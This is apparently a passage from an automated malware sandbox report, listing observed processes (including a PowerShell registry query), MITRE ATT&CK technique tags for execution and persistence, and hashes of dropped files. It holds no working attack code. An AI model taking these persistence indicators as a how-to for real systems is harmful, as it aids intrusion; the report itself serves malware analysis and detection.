C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2772
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4928
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵PID:8
-
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Modifies data under HKEY_USERS
PID:1512
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵
- Modifies data under HKEY_USERS
PID:684
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c364ae435d37c5c29f3b180eccd6559b
SHA17bad9b366ab90045557dfefdebeaa926c61c0d80
SHA25614aa0b52ed57b7559995d7e7d90853de7495e3b70f886a44743c8f6c88f409a3
SHA512cb35872f197c28d2917c7fb0ace22b0c4edee5b3739cf294127ee975c5c2928cf50317dca91da6a41a1c0d95b46025abe1eac5fc4675c7ba371871d49901a555
-
Filesize
2KB
MD55d8f2816046eba3d193ab91d43a1b91c
SHA11702fef8f248f8e9c06634e9cd2d762968505863
SHA2567360772650f2977d38342cc00c0d0602245b404ea3bd057a26a051344926e442
SHA512815462e85d3804bc10c053e75c3efed8ce0aecc9e73c2203614ca369841be8e8ba38e5c1c8a0e456b95b9bac080279b1a6c6d2950e66b86aa685c10dd7f4bc38
-
Filesize
84B
MD5f86b510ca1c10d34b472a6ac481de489
SHA1f09b928594cbe87a95fe507751765ecfe9531730
SHA25662500cf7bc23a927554cb620f041d8e293c01fdff882ecf5278d94f18e722212
SHA5129c9a3ecb642fccdcc5ef9bf58b4142bc03fe48430824fb67445b17346284978998a61b70b896b2db5b9ed3928aadc105d349dd5651240dbd451fb8bcabd05cbe
-
Filesize
60B
MD5324080a9ec1ac135f76d418d049e1f3b
SHA11278fba9ad7321223fad261f4df96bb4c8b57453
SHA2562b99323aba75af357ad285b504844594511f667aecf18cc0d3fe6f28b15e1786
SHA51273375eb77f1ba5e44db4cc42ae2b93f9007a2582e7cc742153692cc2dd547400205e0b741efd99a16dc293aa68b8e754a29dcf46be044b286d1f89cd2b5ff1be
-
Filesize
15B
MD5675951f6d9d75fd2c9c06b5ff547c6fd
SHA19b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA25660fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA51244dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea
-
Filesize
68B
MD59647d72b2e550494c9002b276c8a47ca
SHA1fd73657ec071b7bf4b13fd459e2dd6126770b3ad
SHA256c7fd03466cd8b0d132bd19c9de5b164605645cb480b65063dc129278285d5752
SHA512945eb3002a581c89fd27820f6a28eff4f5ec780507b5008450c52e12bb9b37ea4e3c44ff0b1ed866e539bb8dec96ee07599f991802be302018d2a95495c5de4a
-
Filesize
422KB
MD5bb8368b73f14ff524357c8b5da99f709
SHA190bb61f9c00e777e911cafb07f02e6c256b051cb
SHA256988d79109c2b85c6b44f0f601809fc099fc313258d7ea7568ce07ea4fa420e39
SHA5129d065497e78393df9b5df1ea6a61729443c1bd90feb95570cc67bdf3edea24b57709e6740b6ca0d248d3870d41a6c26fce63909f208277c873da1847b3baadcd
-
Filesize
496B
MD5b1254d97803f4d553792cfe74ec41103
SHA1220f54587ee8aa0fefd6ac1042547cfb207d8f7b
SHA256163641eefc14ae1cacd529945e55fc0963183b845169b4ee6aa4924ce615f421
SHA5121709f3f70bb408d479123440468b9009cf7cec613015fc8360f1510407143eb6d677bcb260b1adfd767dbea0baf14cd49c923cf476aed10124c2e5537ab45ed6
-
Filesize
1KB
MD5d58f22287faeec10f40ef7cc70700b0a
SHA133f5203b340fb4a76584896cb9ae70fa15b26750
SHA256f665f54d1e494266e310621e2e705b362cbf886538d05a4d1984b35dbbbac51a
SHA5124b8dc758ff3a58e3076b9c317be630882829757b2dea78b0e58aeeaa635df146c2f060501a09cb1b5a1a216d86525092931c25adc738d3513c181e9657d8604a
-
Filesize
22B
MD576cdb2bad9582d23c1f6f4d868218d6c
SHA1b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA2568739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA5125e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
-
Filesize
1KB
MD5d94320ab879b0e871c777afe94ff0a7a
SHA12e51d87d0bb529dd17ff57e011e8591e6dc9ed21
SHA256696992be7553f6af99d550d920bf442f1fcd4bba3c22f3bfacbe83d2bf684e93
SHA5129a90f7f620cb560750f050c26bd5b7f844d699e1e3285bdbc1ff5d86cea44aaff633c1e921c6c4da7423dbae30a9347d2640927aeb1d37b4b8db36ff46d9027e
-
Filesize
3KB
MD5a8834c224450d76421d8e4a34b08691f
SHA173ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596
-
Filesize
146B
MD514a9867ec0265ebf974e440fcd67d837
SHA1ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA51236c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
1KB
MD5f79387492e5d2264cb94e2f480feaf78
SHA113f478f478bf824d8cccb611ac9b2645d5523c93
SHA256f7d942ea9e79af246b7a4e461133ed9434f980e837a8b96f1e35f856ddead9e7
SHA512c1a16d6c0edeba6659f08ae115b4ed5c496063d9e4339ff0869a85295798fb66281dba43b6de8118bda69db0d34a65966f84c522b9adcf94581934438c015479
-
Filesize
1KB
MD5179c13282cb3d9ac83350f6c0fc57490
SHA1101ecef79bb336e54254114a72ce96385f23df11
SHA256e593c67c579d6913d568e33acdb21db32da1551b3dd6651435e7e83e4f8cda47
SHA5123a5b998c1aa7fba18549d7d8b7cfb47f0a694c5f8de53410643026527b035f12f388f4d79d8603d4c728e6194b9d25a65ecf1bd674a09de9ec58656c5427a5d7
-
Filesize
944B
MD518cefb8a6607fef1e79c761bac3c11c2
SHA160be5d21b5de7ff7b27364cd4684da32cc260592
SHA2560ca2a346f988298890d30c43028c0d3829832086d546629fc29786c13a1a68e4
SHA5126c4b27d026d3f0dd41aa13563e455baf660907053d125bd028ce500fc4dd5163e244b9aaad95338346ce31dbaf3e77e609aecf6450b85650826928e9282caaf3
-
Filesize
944B
MD5d65ebc84c6b0b52901fb46f5e2b83ab5
SHA1d036a0c3eb9e1616d0f7f5ca41171060c13a3095
SHA256d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1
SHA51288ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be
-
Filesize
64B
MD5c40d1b3059c7efe3bdd1e9904ffc3d9d
SHA1d06203aa0a3db350b014b60170c7787ebcc43c09
SHA2564614a2a24de011532603052f5dc10ffa96451fa3cf9c175c242ccd56fe9580bc
SHA512ac6db9b67372485919778743010c1f040fa29fa223e04b4c5461d1150f18ced1fd90b39013ed3264e7c6f83cbf07d2b07e2b4905d87c7598f11bc40054cb7db1
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD5ca24df1817fa1aa670674846e5d41614
SHA1dac66ea013bcc46d24f1ece855568187c6080eaf
SHA2563b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db
SHA512fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
2KB
MD5263dbab0b1e6fd7ed52f65d65ed7b75c
SHA18aeef364b786b360b48d70d7f72ea59566f487f5
SHA25617f549384ef65a041ea38cf4494f3ce7584235476347b38f4d10df4a195f6789
SHA5127a8197007e9bb13ed138ff52c56a10ed5b46fcf0a69a16299181c65d77ea5d2954f1ce85a4810d113d3bd8fd1587138f6a85142bb439d80b18924efaf7b94e88
-
Filesize
1KB
MD5a5bdf774415e60031db70e1cd82a7e12
SHA1cdab55d88541bc247d4a22206eecf1afce25aef7
SHA25606ea2715df7837b8253962f482ec1049d81c2863265489c00a1d349a7380c92f
SHA5125ea2e8a52c48276a3a8fd16002bc9c04a70898a58416c564001aced9befd5b0681621b9e20dcad999414a09c4f55471f3f22cf204fbdc78f1248d884672989e3
-
Filesize
1KB
MD548b050853d31182af4c002c35c511227
SHA19684cb98908b2bf1a550bb64fd2494c22f40d845
SHA2569aa6bba1241b90ae604d33bb001d2e0d6334620fe864756452c87a3e2c318aa2
SHA512d04ac1f1a07a50a655173e7f1d16d649248a2f3abd189195dd3e5c3cc6868450b5653657a73f1929311b700d3f0ebed1c7c635fb2694ce876e54246edc2c4ab7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5593fce7f4b379c68276fc70efabe0d48
SHA19d2de20088539b04b8e968b53a44cf835d2c2a9a
SHA256679ff21504442c59cccb3c9cc5ae83860e9ba38f53a9ff3a808cd6bdcd649452
SHA512855aaf882026a8c986a4e58fd91cdbbc45e4880f0fd07f3482e4a5403400bce48a5d738e3cea657cd4266da36f15d42928dce892e1789e9f3c5e0abe0ea1eb5f
-
Filesize
3KB
MD52d0a3b082df6ede4c5b88199d1fceba8
SHA11d3440eca70896d4f39090144c63ba1c84353ad5
SHA2563c15f3dc8fb13e8304c088f37344e0628925f405db22b633623e9f93cb28dc35
SHA512f4f9a1b57906c05c3c922b56a638c1c7fbf5b9e19e007146cc81901e0019539dbaa5269ad47dffafd318cc37769015023f336d99beb54de384777631c46eeb89
-
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize1.8MB
MD566a65322c9d362a23cf3d3f7735d5430
SHA1ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA5120a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21
-
Filesize
379B
MD518047e197c6820559730d01035b2955a
SHA1277179be54bba04c0863aebd496f53b129d47464
SHA256348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA5121942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877
-
Filesize
652B
MD536ee57695ffa24ab848ff0c1109d0376
SHA16bd0171a3e29362760eb8b4e3891de6926202f6d
SHA256e43300ed1ed4842df851a06630790bbb388d5015a7975e56c95a0520941a9444
SHA512127acd6112e88b276c83b632c88978c44b28688e7e1e60dc4fa6470cea74186c457bc4fa65e5e0504b567172a275c9ff429c657f0be5c662f68fc944e6747919
-
Filesize
426B
MD5b462a7b0998b386a2047c941506f7c1b
SHA161e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
-
Filesize
369B
MD54b95f820d1f0443d31926f6811ee0178
SHA17411311727cba8fd8e8200aa37d13b43873395af
SHA2560c62da7119c12d3e2aa9c7821c43b1135a6cec4d9bda48568ca0c33608b8036a
SHA5129b04b8714e04d3711c76ca252b0e9b4a7a5d89f778f071e0342a45ed38bbaba34490ee40a1c2f16895b256c35411f4e6c457fc84204ad33724f48e4455ace28a
-
Filesize
652B
MD50ec304a440803e51d6749401156fb4a2
SHA14429ae313ed98c3b5c7099373f478ae095b38df0
SHA25682b9bf38c8ff0111e04f28711586b793f4f3e9db87aa7e5028e09886bb542c2f
SHA5123c85f679d8715b25bd28b51af3c31602d6600f9624bdd1b580badcdcbfb61dc9dbde4b7b637effa73ce100a0bd2c320ba92c10a75f8a82b61e82b113e227c173
-
Filesize
311B
MD57bc8de6ac8041186ed68c07205656943
SHA1673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA25636865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA5120495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba
-
Filesize
369B
MD57b8ac993885a1479621e15818e1195a4
SHA105dc77a6db648f62f2fb1424f10f22548de0de49
SHA256c01a6d93e100bde9bf4e13ee7011c79ba7074b3d902ff09d20c81b6a0a67825e
SHA512b0291dc24aae24d8c47533e9763dc2aef84a0ea8716207af1784cdfb75fbf9c6e4fb6542c86595095c9d7c08b753081b48c82a1b713d2c8f956d7af600ee4d48